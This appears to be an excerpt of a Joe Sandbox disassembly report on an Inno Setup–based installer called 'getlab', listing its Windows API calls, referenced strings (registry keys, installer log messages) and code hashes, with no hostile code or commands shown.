                                                                          • 73A24C40.GDI32(?,00000000,?,0041A93C,?), ref: 0041CA44
                                                                          • 73A26180.GDI32(0041A93C,?,00000001,00000001,00000000,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA68
                                                                          • 73A24C00.GDI32(?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA78
                                                                          • SelectObject.GDI32(0041CE34,00000000), ref: 0041CA93
                                                                          • FillRect.USER32(0041CE34,?,?), ref: 0041CACE
                                                                          • SetTextColor.GDI32(0041CE34,00000000), ref: 0041CAE3
                                                                          • SetBkColor.GDI32(0041CE34,00000000), ref: 0041CAFA
                                                                          • PatBlt.GDI32(0041CE34,00000000,00000000,0041A93C,?,00FF0062), ref: 0041CB10
                                                                          • 73A24C40.GDI32(?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C), ref: 0041CB23
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041CB54
                                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C), ref: 0041CB6C
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?), ref: 0041CB75
                                                                          • 73A18830.GDI32(0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB84
                                                                          • 73A122A0.GDI32(0041CE34,0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB8D
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041CBA6
                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 0041CBBD
                                                                          • 73A24D40.GDI32(0041CE34,00000000,00000000,0041A93C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC02,?,?,00000000), ref: 0041CBD9
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041CBE6
                                                                          • DeleteDC.GDI32(00000000), ref: 0041CBFC
                                                                            • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                                          • String ID:
                                                                          • API String ID: 1381628555-0
                                                                          • Opcode ID: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                                          • Instruction ID: 82b5d3b79294c4079cc38f46940f8a3e5246528c32e36f15c424f6ef30e38055
                                                                          • Opcode Fuzzy Hash: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                                          • Instruction Fuzzy Hash: 0061F071A44608AFDB10EBE5DC86FEFB7B8EB48704F10446AB504E7281D67CA9508B69
                                                                          APIs
                                                                          • ShowWindow.USER32(?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000,00498035,?,00000000), ref: 0049795F
                                                                          • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000), ref: 00497972
                                                                          • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000), ref: 00497982
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004979A3
                                                                          • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000), ref: 004979B3
                                                                            • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                          • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                          • API String ID: 2000705611-3672972446
                                                                          • Opcode ID: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                                          • Instruction ID: f92775941c35c4987ffcee83f2591dcd2e8f64eb72217f5dcf8b9acaa4e0c6bb
                                                                          • Opcode Fuzzy Hash: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                                          • Instruction Fuzzy Hash: 3E91D7306182449FDF11EBA5C856BAE7BF4EB49308F5184B7F500A7392D67CAC05CB19
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,0045A7B4,?,?,?,?,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 0045A666
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                          • API String ID: 1452528299-3112430753
                                                                          • Opcode ID: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                                          • Instruction ID: 580fd2345af5d8a11a71580b87de25b1444814d8228b9e74f7717922954df390
                                                                          • Opcode Fuzzy Hash: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                                          • Instruction Fuzzy Hash: E07181307002445BCB01EB6988817AE7BB59F48319F50866BFC01EB383DB7CDE59879A
                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 0045C9FA
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CA1A
                                                                          • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CA27
                                                                          • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CA34
                                                                          • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CA42
                                                                            • Part of subcall function 0045C8E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C987,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C961
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CAFB
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CB04
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                          • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                          • API String ID: 59345061-4263478283
                                                                          • Opcode ID: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                                          • Instruction ID: 7cfcd68cf7d50f34506c8699d7ac6bd3cbd645d605ef7a14e0a5f99aee2185cc
                                                                          • Opcode Fuzzy Hash: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                                          • Instruction Fuzzy Hash: C25186B1D00308EFDB11DF99C885BAEBBB8EB4C311F14806AF915B7241C6799945CFA9
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,00456875), ref: 0045657A
                                                                          • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,00456875), ref: 004565A0
                                                                          • SysFreeString.OLEAUT32(?), ref: 0045672D
                                                                          Strings
                                                                          • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 0045668F
                                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456764
                                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456712
                                                                          • CoCreateInstance, xrefs: 004565AB
                                                                          • IPersistFile::Save, xrefs: 004567FC
                                                                          • IPropertyStore::Commit, xrefs: 0045677D
                                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566C3
                                                                          • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 0045679E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstance$FreeString
                                                                          • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                          • API String ID: 308859552-3936712486
                                                                          • Opcode ID: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                                          • Instruction ID: c38ea0ca400292199a4bf55cc3a6d877564858b73cfd7edbf1df179bb9384e2e
                                                                          • Opcode Fuzzy Hash: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                                          • Instruction Fuzzy Hash: A5A12170A00145AFDB50DFA9C885B9E7BF8AF09306F55406AF804E7362DB38DD48CB69
                                                                          APIs
                                                                          • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3BB
                                                                          • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                                          • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3D7
                                                                          • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3EE
                                                                          • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3FA
                                                                          • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B427
                                                                          • 73A1A480.USER32(00000000,00000000,0041B45A,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B44D
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                                          • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                                          • DeleteDC.GDI32(?), ref: 0041B4D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                                          • String ID:
                                                                          • API String ID: 359944910-0
                                                                          • Opcode ID: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                                          • Instruction ID: 33ab0b3d7217a913ee79b1f77f60082389afcfeada11791300d2e7ee1e5313f5
                                                                          • Opcode Fuzzy Hash: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                                          • Instruction Fuzzy Hash: FC41BC71E44619AFDB10DAE9C946FEFB7BCEB08704F104466B614F7281D678AD408BA8
                                                                          APIs
                                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472AE8
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472BEF
                                                                          • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472C05
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472C2A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                          • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                          • API String ID: 971782779-3668018701
                                                                          • Opcode ID: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                                          • Instruction ID: fd1e6c444996228d4851cdbb4885a0c41f61386fce8022a34f2115261328fc48
                                                                          • Opcode Fuzzy Hash: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                                          • Instruction Fuzzy Hash: 06D13574A001499FDB11EFA9D981BDEBBF4AF08304F50806AF904B7392D778AD45CB69
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,?,00000000,?,00000000,00454AE1,?,0045A98A,00000003,00000000,00000000,00454B18), ref: 00454961
                                                                            • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 004549E5
                                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 00454A14
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045487F
                                                                          • RegOpenKeyEx, xrefs: 004548E4
                                                                          • , xrefs: 004548D2
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$FormatMessageOpen
                                                                          • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                          • API String ID: 2812809588-1577016196
                                                                          • Opcode ID: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                                          • Instruction ID: ff4e522da132bb0e31d6f3ae6b90b680e2e6169bdaf0a1bf0a59660f44ee0e74
                                                                          • Opcode Fuzzy Hash: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                                          • Instruction Fuzzy Hash: 5B912571E44108ABDB40DFD5D942BDEB7F8EB48309F10406AF900FB682D6789E459B69
                                                                          APIs
                                                                            • Part of subcall function 00459184: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 0045931F
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 00459389
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 004593F0
                                                                          Strings
                                                                          • .NET Framework version %s not found, xrefs: 00459429
                                                                          • v4.0.30319, xrefs: 00459311
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004592D2
                                                                          • v1.1.4322, xrefs: 004593E2
                                                                          • v2.0.50727, xrefs: 0045937B
                                                                          • .NET Framework not found, xrefs: 0045943D
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045933C
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004593A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Close$Open
                                                                          • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                          • API String ID: 2976201327-446240816
                                                                          • Opcode ID: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                                          • Instruction ID: b06f59bb3d6be91165b8bdbc27cbaff9901adf20ec6b7ffb5bff20868c6d7bc9
                                                                          • Opcode Fuzzy Hash: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                                          • Instruction Fuzzy Hash: 7F51A131A04144EBCB00DFA988A17EE77B6DB49305F54447BE800DB382E63D9E0ACB58
                                                                          APIs
                                                                          • CloseHandle.KERNEL32(?), ref: 0045889B
                                                                          • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004588B7
                                                                          • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004588C5
                                                                          • GetExitCodeProcess.KERNEL32(?), ref: 004588D6
                                                                          • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045891D
                                                                          • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458939
                                                                          Strings
                                                                          • Helper process exited, but failed to get exit code., xrefs: 0045890F
                                                                          • Stopping 64-bit helper process. (PID: %u), xrefs: 0045888D
                                                                          • Helper process exited., xrefs: 004588E5
                                                                          • Helper process exited with failure code: 0x%x, xrefs: 00458903
                                                                          • Helper isn't responding; killing it., xrefs: 004588A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                          • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                          • API String ID: 3355656108-1243109208
                                                                          • Opcode ID: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                                          • Instruction ID: 5c1f132ce02699e8ecfae473a4aa832f70e08e49b07aa2054fbd8a494dc4d87a
                                                                          • Opcode Fuzzy Hash: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                                          • Instruction Fuzzy Hash: 582171706087409AD710E779C44575BB6D4AF48309F00C82FB9DAD7693DE7CE8488B6B
                                                                          APIs
                                                                            • Part of subcall function 0042DDDC: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 00454623
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 0045475F
                                                                            • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                          Strings
                                                                          • RegCreateKeyEx, xrefs: 00454597
                                                                          • , xrefs: 00454585
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045453B
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045456B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFormatMessageQueryValue
                                                                          • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                          • API String ID: 2481121983-1280779767
                                                                          • Opcode ID: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                                          • Instruction ID: 79a928fbfbb5cbc52e9f584d13fa8ff479f10e23804a0d57af644d787f67e4fc
                                                                          • Opcode Fuzzy Hash: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                                          • Instruction Fuzzy Hash: 4C812275A00209AFDB00DFD5C841BEEB7B9EF49305F50452AF900FB292D7789A49CB69
                                                                          APIs
                                                                            • Part of subcall function 00453890: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                                            • Part of subcall function 00453890: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004961D9
